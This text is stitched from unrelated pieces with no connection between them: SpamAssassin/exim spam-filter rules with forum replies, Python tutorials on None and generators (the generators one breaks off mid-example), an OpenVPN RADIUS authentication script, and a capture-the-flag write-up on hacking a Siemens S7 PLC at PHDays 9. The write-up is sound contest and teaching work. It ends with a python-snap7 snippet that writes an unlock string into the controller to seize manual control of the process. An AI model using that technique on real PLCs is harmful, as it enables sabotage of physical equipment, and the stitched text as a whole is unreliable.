describe RCVD_IN_BLSPAMCANIBAL Relay is listed in bl.spamcannibal.org
tflags RCVD_IN_BLSPAMCANIBAL net
score RCVD_IN_BLSPAMCANIBAL 3.0
header RCVD_IN_ANONMAILS eval:check_rbl('anonmails-lastexternal', 'spam.dnsbl.anonmails.de.')
describe RCVD_IN_ANONMAILS Relay is listed in spam.dnsbl.anonmails.de
tflags RCVD_IN_ANONMAILS net
score RCVD_IN_ANONMAILS 3.0
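On the exim side, the change is illustrative only - the exact rule in VestaCP's exim configuration may look different on your install - but the idea is to turn the SpamAssassin rejection rule from a deny into a warn that only tags the message, something like:
# before: spam is refused outright
#   deny    message   = This message scored $spam_score spam points.
#           spam      = nobody:true
#           condition = ${if >{$spam_score_int}{SPAM_SCORE}{1}{0}}
# after: spam is tagged and delivered, so it can be filed into the .spam folder
warn    spam       = nobody:true
        condition  = ${if >{$spam_score_int}{SPAM_SCORE}{1}{0}}
        add_header = X-Spam-Status: Yes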
sacredwebsite wrote: How about a gist or a git repo to keep your changes/updates recent in one location for future reference?
SS88 wrote: Noted, will do!
Meow wrote: So, where is it?
SS88 wrote: Sorry for being slow! I'm trying to get everything on to GitHub as quickly as I can.
SS88 wrote: ↑Tue Apr 26, 2016 1:03 am
Hello VestaCP Community!
I have now merged this topic to GitHub. I am reluctant to keep it updated on the VestaCP forums - but it will forever stay updated on GitHub.
https://github.com/SS88UK/SpamAssassinRules
Once you have installed the rules and restarted SpamAssassin the rules will help reduce spam on your server.
You need to be careful. I saw off-the-shelf software at http://www.testelium.com. They have statistics on the mailing list and a spam report, plus universal servers around the world. Tell me how to implement such an algorithm for your own application (you need to send notifications to users and send data from a computer). Maybe there is a link to something like a GitHub repo?
|
Hardware and software environment
windows 10 64bit
anaconda3 with python 3.7
Watch the video here
This is the YouTube link, which requires a way around the Great Firewall. If you like my videos, please remember to subscribe to my channel, turn on the little bell next to it, like and share. Thank you for your support.
In [1]: type(None)
Out[1]: NoneType
Note that None is the only value of the NoneType data type. In other words, we cannot create other variables of type NoneType, but we can assign None to any variable. If you want what a variable stores to never be confused with any other value, you can use None.
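A common case (an illustrative example of my own, not from the original article) is using None as the default value of a function argument, so that "no value was passed" cannot be confused with a legitimate value such as 0, '' or []:
def append_item(item, bucket=None):
    # None marks "no list supplied"; an empty list [] would be a real value
    if bucket is None:
        bucket = []
    bucket.append(item)
    return bucket

print(append_item(1))       # [1]
print(append_item(2, [0]))  # [0, 2]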
None is neither 0 nor the same as False; it means the absence of a value, i.e. an empty value. This empty value is not the same as an empty object such as [] or ''; see the examples below.
In [2]: None is ''
Out[2]: False
In [3]: None is []
Out[3]: False
In [4]: type('')
Out[4]: str
In [5]: type([])
Out[5]: list
If you look at it from the "everything is an object" angle, it is even easier to understand: [] is a list object, while '' is a str object.
When None is used with if, None always evaluates as false, so the whole conditional expression is False.
In [8]: if None:
...: print('True')
...: else:
...: print('False')
...:
False
In a function, if there is no explicit return value, None is returned by default. Let's look at an example.
In [9]: def func(str):
...: print(str)
...:
In [10]: a = func("Hello python.")
Hello python.
In [11]: type(a)
Out[11]: NoneType
|
The difficult part was figuring out the right config syntax; the only one that worked is below:
auth-user-pass-verify "C:/Python27/python.exe user-auth.py" via-env
The most surprising thing was:
OpenVPN cannot run a python (or vbs) script without crutches!
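(One thing the post does not spell out, so treat it as an assumption about this setup: for OpenVPN to pass the password to an external script through environment variables, the server config normally also needs the directive below.)
script-security 3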
user-auth.py
Code: Select all
#!/usr/bin/python
import os
import sys
import socket
import pyrad.packet
from pyrad.client import Client
from pyrad.dictionary import Dictionary
srv=Client(server="server_ip", secret="some_s3cret", dict=Dictionary("dictionary"))
req=srv.CreateAuthPacket(code=pyrad.packet.AccessRequest, User_Name=os.environ.get('username'))
req["User-Password"]=req.PwCrypt(os.environ.get('password'))
try:
reply=srv.SendPacket(req)
except pyrad.client.Timeout:
print "RADIUS server does not reply"
sys.exit(1)
except socket.error, error:
print "Network error: " + error[1]
sys.exit(1)
if reply.code==pyrad.packet.AccessAccept:
print "access accepted"
sys.exit(0)
else:
print "access denied"
sys.exit(1)
|
Following in the footsteps of Industrial Ninja: how PLCs were hacked at Positive Hack Days 9
Positive Technologies corporate blog,
Information security,
Competitive programming,
IT infrastructure
At the recent PHDays 9 we ran a competition in hacking a gas pumping plant - the Industrial Ninja contest. The site had three stands with different security settings (No Security, Low Security, High Security) emulating the same industrial process: air was pumped under pressure into a balloon (and then released).
Despite the different security settings, the hardware of the stands was identical: a Siemens Simatic S7-300 series PLC; an emergency deflation button and a pressure gauge (connected to the PLC's digital inputs (DI)); valves for pumping air in and letting it out (connected to the PLC's digital outputs (DO)) - see the figure below.
Depending on the pressure readings and in accordance with its program, the PLC decided whether to deflate or inflate the balloon (opening and closing the corresponding valves). All the stands, however, had a manual control mode that made it possible to control the valve states without any restrictions.
The stands differed in how hard it was to enable this mode: on the unprotected stand it was easiest, and on the High Security stand, accordingly, hardest.
Over the two days, five of the six tasks were solved; the first-place participant earned 233 points (he spent a week preparing for the contest). The three prize winners: 1st place - a1exdandy, 2nd - Rubikoid, 3rd - Ze.
However, during PHDays none of the participants managed to beat all three stands, so we decided to run an online contest and published the hardest task in early June. Participants had a month to complete the task, find the flag, and write up the solution in a detailed and interesting way.
Below the cut we publish the best solution write-up received during that month. It was found by Aleksey Kovrizhnykh (a1exdandy) of Digital Security, who took first place in the contest during PHDays. Below we present his text with our comments.
Initial analysis
So, the task was an archive with these files:
block_upload_traffic.pcapng
DB100.bin
hints.txt
The hints.txt file contains the information and hints needed to solve the task. Here are its contents:
Petrovich told me yesterday that blocks can be uploaded from PlcSim into Step7.
The stand used a Siemens Simatic S7-300 series PLC.
PlcSim is a PLC emulator that lets you run and debug programs for Siemens S7 PLCs.
The DB100.bin file apparently contains the PLC's DB100 data block:
00000000: 0100 0102 6e02 0401 0206 0100 0101 0102  ....n...........
00000010: 1002 0501 0202 2002 0501 0206 0100 0102  ...... .........
00000020: 0102 7702 0401 0206 0100 0103 0102 0a02  ..w.............
00000030: 0501 0202 1602 0501 0206 0100 0104 0102  ................
00000040: 7502 0401 0206 0100 0105 0102 0a02 0501  u...............
00000050: 0202 1602 0501 0206 0100 0106 0102 3402  ..............4.
00000060: 0401 0206 0100 0107 0102 2602 0501 0202  ..........&.....
00000070: 4c02 0501 0206 0100 0108 0102 3302 0401  L...........3...
00000080: 0206 0100 0109 0102 0a02 0501 0202 1602  ................
00000090: 0501 0206 0100 010a 0102 3702 0401 0206  ..........7.....
000000a0: 0100 010b 0102 2202 0501 0202 4602 0501  ......".....F...
000000b0: 0206 0100 010c 0102 3302 0401 0206 0100  ........3.......
000000c0: 010d 0102 0a02 0501 0202 1602 0501 0206  ................
000000d0: 0100 010e 0102 6d02 0401 0206 0100 010f  ......m.........
000000e0: 0102 1102 0501 0202 2302 0501 0206 0100  ........#.......
000000f0: 0110 0102 3502 0401 0206 0100 0111 0102  ....5...........
00000100: 1202 0501 0202 2502 0501 0206 0100 0112  ......%.........
00000110: 0102 3302 0401 0206 0100 0113 0102 2602  ..3...........&.
00000120: 0501 0202 4c02 0501 0206 0100            ....L.......
Judging by its name, the block_upload_traffic.pcapng file contains a dump of the traffic in which the blocks were uploaded to the PLC.
It's worth noting that at the contest site during the conference, getting this traffic dump was a bit harder. To do so, you had to make sense of a script in the project file for TeslaSCADA2. From it you could work out where the RC4-encrypted dump was located and which key had to be used to decrypt it. Data block dumps at the site could be obtained with an S7 protocol client; I used the demo client from the Snap7 package for that.
Extracting the signal processing blocks from the traffic dump
A look at the contents of the dump shows that the signal processing blocks OB1, FC1, FC2, and FC3 are transferred in it:
These blocks need to be extracted. That can be done, for example, with the following script, after first converting the traffic from the pcapng format to pcap:
#!/usr/bin/env python2
import struct
from scapy.all import *
packets = rdpcap('block_upload_traffic.pcap')
s7_hdr_struct = '>BBHHHHBB'
s7_hdr_sz = struct.calcsize(s7_hdr_struct)
tpkt_cotp_sz = 7
names = iter(['OB1.bin', 'FC1.bin', 'FC2.bin', 'FC3.bin'])
buf = ''
for packet in packets:
if packet.getlayer(IP).src == '10.0.102.11':
tpkt_cotp_s7 = str(packet.getlayer(TCP).payload)
if len(tpkt_cotp_s7) < tpkt_cotp_sz + s7_hdr_sz:
continue
s7 = tpkt_cotp_s7[tpkt_cotp_sz:]
s7_hdr = s7[:s7_hdr_sz]
param_sz = struct.unpack(s7_hdr_struct, s7_hdr)[4]
s7_param = s7[12:12+param_sz]
s7_data = s7[12+param_sz:]
if s7_param in ('\x1e\x00', '\x1e\x01'): # upload
buf += s7_data[4:]
elif s7_param == '\x1f':
with open(next(names), 'wb') as f:
f.write(buf)
buf = ''
Examining the extracted blocks, you will notice that they always begin with the bytes 70 70 (pp). Now we need to learn how to analyze them. The task hint suggests that PlcSim should be used for this.
Getting human-readable instructions from the blocks
To start, let's try programming S7-PlcSim by loading into it several blocks with repeated instructions (= Q 0.0) using the Simatic Manager software, and save the PLC obtained in the emulator to the file example.plc. Looking at the contents of that file, we can easily find the beginning of each loaded block by the 70 70 signature we discovered earlier. In front of each block, the block size is apparently stored as a 4-byte little-endian value.
Once we have this information about the structure of plc files, the following plan for reading S7 PLC programs emerges:
Using Simatic Manager, create in S7-PlcSim a block structure equivalent to the one we got from the dump. The block sizes must match (achieved by filling the blocks with the required number of instructions), as must their identifiers (OB1, FC1, FC2, FC3).
Save the PLC to a file.
Replace the contents of the blocks in the resulting file with the blocks from the traffic dump. The beginning of each block is located by its signature.
Load the resulting file into S7-PlcSim and inspect the contents of the blocks in Simatic Manager.
The block replacement can be done, for example, with the following code:
with open('original.plc', 'rb') as f:
plc = f.read()
blocks = []
for fname in ['OB1.bin', 'FC1.bin', 'FC2.bin', 'FC3.bin']:
with open(fname, 'rb') as f:
blocks.append(f.read())
i = plc.find(b'pp')
for block in blocks:
plc = plc[:i] + block + plc[i+len(block):]
i = plc.find(b'pp', i + 1)
with open('target.plc', 'wb') as f:
f.write(plc)
Aleksey took a path that is perhaps more complicated, but still correct. We expected that participants would use the NetToPlcSim program so that PlcSim could be talked to over the network, upload the blocks into PlcSim via Snap7, and then download those blocks as a project from PlcSim using the development environment.
Opening the resulting file in S7-PlcSim, you can read the overwritten blocks with Simatic Manager. The main device control functions are written in block FC1. Particular attention is drawn to the variable #TEMP0: when it is set, it apparently switches PLC control into manual mode driven by the bit-memory values M2.2 and M2.3. The value of #TEMP0 is set by function FC3.
To solve the task, we need to analyze function FC3 and understand what has to be done so that it returns a logical one.
The PLC signal processing blocks on the Low Security stand at the contest site were arranged in a similar way, but to set the #TEMP0 variable it was enough to write the string my ninja way into block DB1. The value check in that block was easy to follow and did not require deep knowledge of the block programming language. Obviously, at the High Security level gaining manual control is significantly harder, and you have to understand the finer points of the STL language (one of the ways of programming S7 PLCs).
Reversing block FC3
The contents of block FC3 in STL representation:
L B#16#0 T #TEMP13 T #TEMP15 L P#DBX 0.0 T #TEMP4 CLR = #TEMP14M015: L #TEMP4 LAR1 OPN DB 100 L DBLG TAR1 <=D JC M016 L DW#16#0 T #TEMP0 L #TEMP6 L W#16#0 <>I JC M00d L P#DBX 0.0 LAR1 M00d: L B [AR1,P#0.0] T #TEMP5 L W#16#1 ==I JC M007 L #TEMP5 L W#16#2 ==I JC M008 L #TEMP5 L W#16#3 ==I JC M00f L #TEMP5 L W#16#4 ==I JC M00e L #TEMP5 L W#16#5 ==I JC M011 L #TEMP5 L W#16#6 ==I JC M012 JU M010M007: +AR1 P#1.0 L P#DBX 0.0 LAR2 L B [AR1,P#0.0] L C#8 *I +AR2 +AR1 P#1.0 L B [AR1,P#0.0] JL M003 JU M001 JU M002 JU M004M003: JU M005M001: OPN DB 101 L B [AR2,P#0.0] T #TEMP0 JU M006M002: OPN DB 101 L B [AR2,P#0.0] T #TEMP1 JU M006M004: OPN DB 101 L B [AR2,P#0.0] T #TEMP2 JU M006M00f: +AR1 P#1.0 L B [AR1,P#0.0] L C#8 *I T #TEMP11 +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP7 L P#M 100.0 LAR2 L #TEMP7 L C#8 *I +AR2 TAR2 #TEMP9 TAR1 #TEMP4 OPN DB 101 L P#DBX 0.0 LAR1 L #TEMP11 +AR1 LAR2 #TEMP9 L B [AR2,P#0.0] T B [AR1,P#0.0] L #TEMP4 LAR1 JU M006M008: +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP3 +AR1 P#1.0 L B [AR1,P#0.0] JL M009 JU M00b JU M00a JU M00cM009: JU M005M00b: L #TEMP3 T #TEMP0 JU M006M00a: L #TEMP3 T #TEMP1 JU M006M00c: L #TEMP3 T #TEMP2 JU M006M00e: +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP7 L P#M 100.0 LAR2 L #TEMP7 L C#8 *I +AR2 TAR2 #TEMP9 +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP8 L P#M 100.0 LAR2 L #TEMP8 L C#8 *I +AR2 TAR2 #TEMP10 TAR1 #TEMP4 LAR1 #TEMP9 LAR2 #TEMP10 L B [AR1,P#0.0] L B [AR2,P#0.0] AW INVI T #TEMP12 L B [AR1,P#0.0] L B [AR2,P#0.0] OW L #TEMP12 AW T B [AR1,P#0.0] L DW#16#0 T #TEMP0 L MB 101 T #TEMP1 L MB 102 T #TEMP2 L #TEMP4 LAR1 JU M006M011: +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP7 L P#M 100.0 LAR2 L #TEMP7 L C#8 *I +AR2 TAR2 #TEMP9 +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP8 L P#M 100.0 LAR2 L #TEMP8 L C#8 *I +AR2 TAR2 #TEMP10 TAR1 #TEMP4 LAR1 #TEMP9 LAR2 #TEMP10 L B [AR1,P#0.0] L B [AR2,P#0.0] -I T B [AR1,P#0.0] L DW#16#0 T #TEMP0 L MB 101 T #TEMP1 L MB 102 T #TEMP2 L #TEMP4 LAR1 JU M006M012: L #TEMP15 INC 1 T #TEMP15 +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP7 L P#M 100.0 LAR2 L #TEMP7 L C#8 *I +AR2 TAR2 #TEMP9 +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP8 L P#M 100.0 LAR2 L #TEMP8 L C#8 *I +AR2 TAR2 #TEMP10 TAR1 #TEMP4 LAR1 #TEMP9 LAR2 #TEMP10 L B [AR1,P#0.0] L B [AR2,P#0.0] ==I JCN M013 JU M014M013: L P#DBX 0.0 LAR1 T #TEMP4 L B#16#0 T #TEMP6 JU M006M014: L #TEMP4 LAR1 L #TEMP13 L L#1 +I T #TEMP13 JU M006M006: L #TEMP0 T MB 100 L #TEMP1 T MB 101 L #TEMP2 T MB 102 +AR1 P#1.0 L #TEMP6 + 1 T #TEMP6 JU M005M010: L P#DBX 0.0 LAR1 L 0 T #TEMP6 TAR1 #TEMP4M005: TAR1 #TEMP4 CLR = #TEMP16 L #TEMP13 L L#20 ==I S #TEMP16 L #TEMP15 ==I A #TEMP16 JC M017 L #TEMP13 L L#20 <I S #TEMP16 L #TEMP15 ==I A #TEMP16 JC M018 JU M019M017: SET = #TEMP14 JU M016M018: CLR = #TEMP14 JU M016M019: CLR O #TEMP14 = #RET_VAL JU M015M016: CLR O #TEMP14 = #RET_VAL
The code is quite long and may seem complicated to someone unfamiliar with STL. There is no point in going over every instruction within this article; the instructions and capabilities of the STL language are covered in detail in the corresponding manual: Statement List (STL) for S7-300 and S7-400 Programming. Here I will give the same code after processing - with labels and variables renamed and comments added that describe the algorithm and some STL constructs. Let me note right away that the block in question implements a virtual machine executing a certain bytecode located in block DB100, whose contents we know. The virtual machine's instructions consist of 1 byte of opcode and argument bytes, one byte per argument. All the instructions considered here take two arguments; in the comments I denote their values as X and Y.
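To make the encoding concrete, the first twelve bytes of DB100 (01 00 01 02 6e 02 04 01 02 06 01 00) decode as follows, in the same notation the disassembler listing below uses:
01 00 01  ->  R1 = DB101[0]
02 6e 02  ->  R2 = 0x6e ('n')
04 01 02  ->  R0 = 0; R1 = (R1 == R2)
06 01 00  ->  CHECK (R1 == R0)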
The code after processing
# Initialization of various variables
L B#16#0
T #CHECK_N # Counter of successfully passed checks
T #COUNTER_N # Counter of the total number of checks
L P#DBX 0.0
T #POINTER # Pointer to the current instruction
CLR
= #PRE_RET_VAL
# Main loop of the bytecode interpreter
LOOP: L #POINTER
LAR1
OPN DB 100
L DBLG
TAR1
<=D # Check whether the pointer has gone past the end of the program
JC FINISH
L DW#16#0
T #REG0
L #TEMP6
L W#16#0
<>I
JC M00d
L P#DBX 0.0
LAR1
# A switch-case construct for handling the different opcodes
M00d: L B [AR1,P#0.0]
T #OPCODE
L W#16#1
==I
JC OPCODE_1
L #OPCODE
L W#16#2
==I
JC OPCODE_2
L #OPCODE
L W#16#3
==I
JC OPCODE_3
L #OPCODE
L W#16#4
==I
JC OPCODE_4
L #OPCODE
L W#16#5
==I
JC OPCODE_5
L #OPCODE
L W#16#6
==I
JC OPCODE_6
JU OPCODE_OTHER
# Handler for opcode 01: load a value from DB101[X] into register Y
# OP01(X, Y): REG[Y] = DB101[X]
OPCODE_1: +AR1 P#1.0
L P#DBX 0.0
LAR2
L B [AR1,P#0.0] # Load argument X (index into DB101)
L C#8
*I
+AR2
+AR1 P#1.0
L B [AR1,P#0.0] # Load argument Y (register index)
JL M003 # A switch-case analogue based on the value of Y
JU M001 # used to select the register to write to.
JU M002 # Similar constructs are used in the other
JU M004 # operations below for the same purpose
M003: JU LOOPEND
M001: OPN DB 101
L B [AR2,P#0.0]
T #REG0 # Write the value of DB101[X] into REG[0]
JU PRE_LOOPEND
M002: OPN DB 101
L B [AR2,P#0.0]
T #REG1 # Write the value of DB101[X] into REG[1]
JU PRE_LOOPEND
M004: OPN DB 101
L B [AR2,P#0.0]
T #REG2 # Write the value of DB101[X] into REG[2]
JU PRE_LOOPEND
# Handler for opcode 02: load the value X into register Y
# OP02(X, Y): REG[Y] = X
OPCODE_2: +AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP3
+AR1 P#1.0
L B [AR1,P#0.0]
JL M009
JU M00b
JU M00a
JU M00c
M009: JU LOOPEND
M00b: L #TEMP3
T #REG0
JU PRE_LOOPEND
M00a: L #TEMP3
T #REG1
JU PRE_LOOPEND
M00c: L #TEMP3
T #REG2
JU PRE_LOOPEND
# Opcode 03 is not used in the program, so we skip it
...
# Handler for opcode 04: compare registers X and Y
# OP04(X, Y): REG[0] = 0; REG[X] = (REG[X] == REG[Y])
OPCODE_4: +AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP7 # the first argument - X
L P#M 100.0
LAR2
L #TEMP7
L C#8
*I
+AR2
TAR2 #TEMP9 # REG[X]
+AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP8
L P#M 100.0
LAR2
L #TEMP8
L C#8
*I
+AR2
TAR2 #TEMP10 # REG[Y]
TAR1 #POINTER
LAR1 #TEMP9 # REG[X]
LAR2 #TEMP10 # REG[Y]
L B [AR1,P#0.0]
L B [AR2,P#0.0]
AW
INVI
T #TEMP12 # ~(REG[Y] & REG[X])
L B [AR1,P#0.0]
L B [AR2,P#0.0]
OW
L #TEMP12
AW # (~(REG[Y] & REG[X])) & (REG[Y] | REG[X]) - equivalent to an equality check
T B [AR1,P#0.0]
L DW#16#0
T #REG0
L MB 101
T #REG1
L MB 102
T #REG2
L #POINTER
LAR1
JU PRE_LOOPEND
# Handler for opcode 05: subtract register Y from register X
# OP05(X, Y): REG[0] = 0; REG[X] = REG[X] - REG[Y]
OPCODE_5: +AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP7
L P#M 100.0
LAR2
L #TEMP7
L C#8
*I
+AR2
TAR2 #TEMP9 # REG[X]
+AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP8
L P#M 100.0
LAR2
L #TEMP8
L C#8
*I
+AR2
TAR2 #TEMP10 # REG[Y]
TAR1 #POINTER
LAR1 #TEMP9
LAR2 #TEMP10
L B [AR1,P#0.0]
L B [AR2,P#0.0]
-I # ACCU1 = ACCU2 - ACCU1, REG[X] - REG[Y]
T B [AR1,P#0.0]
L DW#16#0
T #REG0
L MB 101
T #REG1
L MB 102
T #REG2
L #POINTER
LAR1
JU PRE_LOOPEND
# Handler for opcode 06: increment #CHECK_N when registers X and Y are equal
# OP06(X, Y): #CHECK_N += (1 if REG[X] == REG[Y] else 0)
OPCODE_6: L #COUNTER_N
INC 1
T #COUNTER_N
+AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP7 # REG[X]
L P#M 100.0
LAR2
L #TEMP7
L C#8
*I
+AR2
TAR2 #TEMP9 # REG[X]
+AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP8
L P#M 100.0
LAR2
L #TEMP8
L C#8
*I
+AR2
TAR2 #TEMP10 # REG[Y]
TAR1 #POINTER
LAR1 #TEMP9 # REG[Y]
LAR2 #TEMP10 # REG[X]
L B [AR1,P#0.0]
L B [AR2,P#0.0]
==I
JCN M013
JU M014
M013: L P#DBX 0.0
LAR1
T #POINTER
L B#16#0
T #TEMP6
JU PRE_LOOPEND
M014: L #POINTER
LAR1
# Increment the value of #CHECK_N
L #CHECK_N
L L#1
+I
T #CHECK_N
JU PRE_LOOPEND
PRE_LOOPEND: L #REG0
T MB 100
L #REG1
T MB 101
L #REG2
T MB 102
+AR1 P#1.0
L #TEMP6
+ 1
T #TEMP6
JU LOOPEND
OPCODE_OTHER: L P#DBX 0.0
LAR1
L 0
T #TEMP6
TAR1 #POINTER
LOOPEND: TAR1 #POINTER
CLR
= #TEMP16
L #CHECK_N
L L#20
==I
S #TEMP16
L #COUNTER_N
==I
A #TEMP16
# All checks have passed if #CHECK_N == #COUNTER_N == 20
JC GOOD
L #CHECK_N
L L#20
<I
S #TEMP16
L #COUNTER_N
==I
A #TEMP16
JC FAIL
JU M019
GOOD: SET
= #PRE_RET_VAL
JU FINISH
FAIL: CLR
= #PRE_RET_VAL
JU FINISH
M019: CLR
O #PRE_RET_VAL
= #RET_VAL
JU LOOP
FINISH: CLR
O #PRE_RET_VAL
= #RET_VAL
Now that we understand the virtual machine's instructions, let's write a small disassembler to parse the bytecode in block DB100:
import string
alph = string.ascii_letters + string.digits
with open('DB100.bin', 'rb') as f:
m = f.read()
pc = 0
while pc < len(m):
op = m[pc]
if op == 1:
print('R{} = DB101[{}]'.format(m[pc + 2], m[pc + 1]))
pc += 3
elif op == 2:
c = chr(m[pc + 1])
c = c if c in alph else '?'
print('R{} = {:02x} ({})'.format(m[pc + 2], m[pc + 1], c))
pc += 3
elif op == 4:
print('R0 = 0; R{} = (R{} == R{})'.format(
m[pc + 1], m[pc + 1], m[pc + 2]))
pc += 3
elif op == 5:
print('R0 = 0; R{} = R{} - R{}'.format(
m[pc + 1], m[pc + 1], m[pc + 2]))
pc += 3
elif op == 6:
print('CHECK (R{} == R{})\n'.format(
m[pc + 1], m[pc + 2]))
pc += 3
else:
print('unk opcode {}'.format(op))
break
As a result we get the following virtual machine code:
Virtual machine code
R1 = DB101[0]
R2 = 6e (n)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[1]
R2 = 10 (?)
R0 = 0; R1 = R1 - R2
R2 = 20 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[2]
R2 = 77 (w)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[3]
R2 = 0a (?)
R0 = 0; R1 = R1 - R2
R2 = 16 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[4]
R2 = 75 (u)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[5]
R2 = 0a (?)
R0 = 0; R1 = R1 - R2
R2 = 16 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[6]
R2 = 34 (4)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[7]
R2 = 26 (?)
R0 = 0; R1 = R1 - R2
R2 = 4c (L)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[8]
R2 = 33 (3)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[9]
R2 = 0a (?)
R0 = 0; R1 = R1 - R2
R2 = 16 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[10]
R2 = 37 (7)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[11]
R2 = 22 (?)
R0 = 0; R1 = R1 - R2
R2 = 46 (F)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[12]
R2 = 33 (3)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[13]
R2 = 0a (?)
R0 = 0; R1 = R1 - R2
R2 = 16 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[14]
R2 = 6d (m)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[15]
R2 = 11 (?)
R0 = 0; R1 = R1 - R2
R2 = 23 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[16]
R2 = 35 (5)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[17]
R2 = 12 (?)
R0 = 0; R1 = R1 - R2
R2 = 25 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[18]
R2 = 33 (3)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[19]
R2 = 26 (?)
R0 = 0; R1 = R1 - R2
R2 = 4c (L)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
As you can see, this program simply checks each character from DB101 for equality with a particular value. The final string that passes all the checks is: n0w u 4r3 7h3 m4573r. If this string is placed into block DB101, manual control of the PLC is activated, and the balloon can be popped or deflated.
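Just to illustrate how that final step could look from the attacker's side, here is a sketch using python-snap7 (the PLC address is the one seen in the traffic dump; the rack/slot numbers are an assumption typical for an S7-300):
import snap7

client = snap7.client.Client()
client.connect('10.0.102.11', 0, 2)  # rack 0, slot 2 is an assumption
# write the flag string into data block DB101 starting at offset 0
client.db_write(101, 0, bytearray(b'n0w u 4r3 7h3 m4573r'))
client.disconnect()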
And that's it! Aleksey demonstrated a level of knowledge worthy of an industrial ninja :) We sent the winner commemorative prizes. Many thanks to all the participants!
|
A function that contains the yield keyword is called a generator in Python. The Python interpreter treats any function containing the yield keyword as a generator. An ordinary function or subroutine can only return once, but a generator can pause execution and return an intermediate result - that is what the yield statement does: it returns an intermediate value to the caller and suspends execution.
EXAMPLE:
In [94]: def fab(max):
    ...:     n, a, b = 0, 0, 1
    ...:     while n < max:
    ...:         yield b
    ...:         a, b = b, a + b
    ...:         n = n + 1
    ...:

In [95]: f = fab(5)

In [96]: f.next()
Out[96]: 1

In [97]: f.next()
Out[97]: 1

In [98]: f.next()
Out[98]: 2

In [99]: f.next()
Out[99]: 3

In [100]: f.next()
Out[100]: 5

In [101]: f.next()
---------------------------------------------------------------------------
StopIteration                             Traceback (most recent call last)
<ipython-input-101> in <module>()
----> 1 f.next()

StopIteration:
How fab() executes
When the statement f = fab(5) is executed, the body of fab() does not run immediately; instead, an iterable object is returned first!
The code block of the fab() function only executes when the for loop (or a next() call) runs.
When execution reaches the statement yield b, fab() returns an iteration value. On the next iteration, control resumes at the statement following yield b, then returns to the for loop, and so on until the iteration ends. It looks as if a function, in the course of normal execution, is interrupted by yield several times, and each interruption returns the current iteration value through yield.
From this we can see that a generator keeps handing iteration values back for processing via the yield keyword instead of putting the whole object into memory at once, which saves memory. In this respect generators and iterators are very similar, but if you look deeper there are still differences between the two.
The difference between generators and iterators
Another advantage of generators is that they do not require you to prepare all the elements of the iteration in advance; that is, there is no need to load every element of an object into memory before starting to work on it. A generator only brings an element into memory when the iteration reaches it; before or after that, the element need not exist or may already have been destroyed. This makes generators especially suitable for traversing huge or even infinite sequence-like objects, e.g. large files, large sets, large dicts, the Fibonacci sequence, and so on. This property is called lazy evaluation, and it saves memory effectively. Lazy evaluation is in fact a realization of the idea of coroutines.
Coroutine: a function call that can run independently and can be paused or suspended, and later continued or restarted from the point where the program flow was suspended. When a coroutine is suspended, Python can obtain an intermediate return value from it (returned by yield); when a next() call brings the program flow back into the coroutine, extra or modified arguments can be passed in, and execution continues from the statement after the previous suspension point. This is a function-call style similar to a process interrupt. A coroutine of this kind - one that suspends a function call, returns an intermediate value, and can still continue executing multiple times afterwards - is called a generator.
NOTE: iterators do not have the properties described above and are not well suited to processing huge sequence-like objects, so it is recommended to prefer generators for iteration scenarios.
The advantages of generators
To sum up: the best scenario for using a generator is when you need to traverse a huge data set iteratively, for example a huge file or a complex database query.
EXAMPLE 2: reading a large file
def read_file(fpath):
BLOCK_SIZE = 1024
with open(fpath, 'rb') as f:
while True:
block = f.read(BLOCK_SIZE)
if block:
yield block
else:
return
If you call the read() method directly on the file object, memory usage becomes unpredictable. The better approach is to read the file piece by piece into a fixed-size buffer. Thanks to yield, we no longer need to write an iterator class for file reading; reading the file becomes easy to implement.
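Hypothetical usage of the read_file() generator above - process() is just a placeholder for whatever handling you need:
for block in read_file('huge.log'):
    process(block)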
Enhanced generator features
Besides using the next() method to get the next generated value, the user can also use the send() method to pass a new or modified value back into the generator. In addition, the close() method can be used to exit the generator at any time.
EXAMPLE 3:
In [5]: def counter(start_at=0):
...: count = start_at
...: while True:
...: val = (yield count)
...: if val is not None:
...: count = val
...: else:
...: count += 1
...:
In [6]: count = counter(5)
In [7]: type(count)
Out[7]: generator
In [8]: count.next()
Out[8]: 5
In [9]: count.next()
Out[9]: 6
In [10]: count.send(9) # send a new value back to the yield count expression in the generator
Out[10]: 9
In [11]: count.next()
